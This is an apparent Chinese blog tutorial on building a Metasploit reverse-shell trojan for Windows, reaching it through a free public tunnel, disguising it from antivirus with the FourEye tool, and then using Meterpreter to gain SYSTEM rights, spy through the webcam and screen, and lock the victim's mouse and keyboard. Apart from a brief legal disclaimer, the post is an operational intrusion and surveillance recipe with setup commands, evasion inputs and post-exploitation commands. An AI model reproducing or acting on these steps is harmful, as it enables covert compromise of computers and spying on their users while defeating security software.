msf内网穿透及免杀技术:绕过杀毒软件 监视屏幕及摄像头 控制操作系统

(声明:此文章仅用于技术交流不得用于危害其他计算机安全,任何未经授权的渗透行为都是网络犯罪!)

 

测试环境基于kali 6.8.11 64位与win11专业版及nataap的免费公网隧道(关闭实时保护未关闭防火墙)

1.建立靶机可访问的连接

首先在natapp注册购买免费隧道

注意更改协议为tcp

本地地址为kali的内网地址(终端输入ifconfig)

本地端口设置一个未被占用的端口(终端输入netstat -anp | grep 端口号查看对用端口占用情况)在此使用7777



下载对应版本

下载linux64客户端拉进kali,新建名为natapp的文件夹,把下载好的文件拉入natapp文件夹

打开终端进入文件夹连接服务

等于号后面的id为上述图片authtoken后的文本

连接成功后效果如图

 

打开kali的终端利用msf的venom模块生成针对于windows平台tcp反弹连接的木马

默认保存在root目录下

lhost 为上述域名,lport为对应域名的端口

lhost为kali IP lport为公网隧道与kali 建立连接的端口 7777

开始监听 等待靶机运行木马生成反弹连接

 

2.FourEye免杀

msf自带免杀模块但效果基本没有

实测foureye免杀可过360和火绒,但是在后渗透阶段进入cmd后运行命令会被检测,不能过win11实时保护

        安装pip3

wget https://bootstrap.pypa.io/get-pip.py
python3 get-pip.py
pip -V

       安装mingw-w64(没换源的自行百度kali换源,本测试使用的为中科大源)

apt update 

apt-get install mingw-w64

      安装foureye并运行

git clone https://github.com/lengjibo/FourEye.git
cd FourEye
pip install -r requirements.txt
python3 BypassFramework.py

        

       

shellcode    
1
xor
/root/test1.raw  //文件路径
x86
execute

 

默认生成在根目录shellcode.exe

3.反弹shell连接

将shellcode传输到靶机上运行后kali成功建立连接(出现meterpreter即建立连接成功)

若靶机为本地用户administrator  可直接使用getsystem的到system权限

常用命令:

shell 进入对方终端

getuid 查看当前用户

getsystem 提权

webcam_list 列出摄像头

webcam_snap 使用摄像头拍照

webcam_stream 监视摄像头

screenshare 监视屏幕

uictl en/disable mouse 启用或禁用鼠标

uictl en/disable keyboard 启用或禁用键盘

更多后渗透命令可参考

MSF命令总结 - 大柿子 - 博客园

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值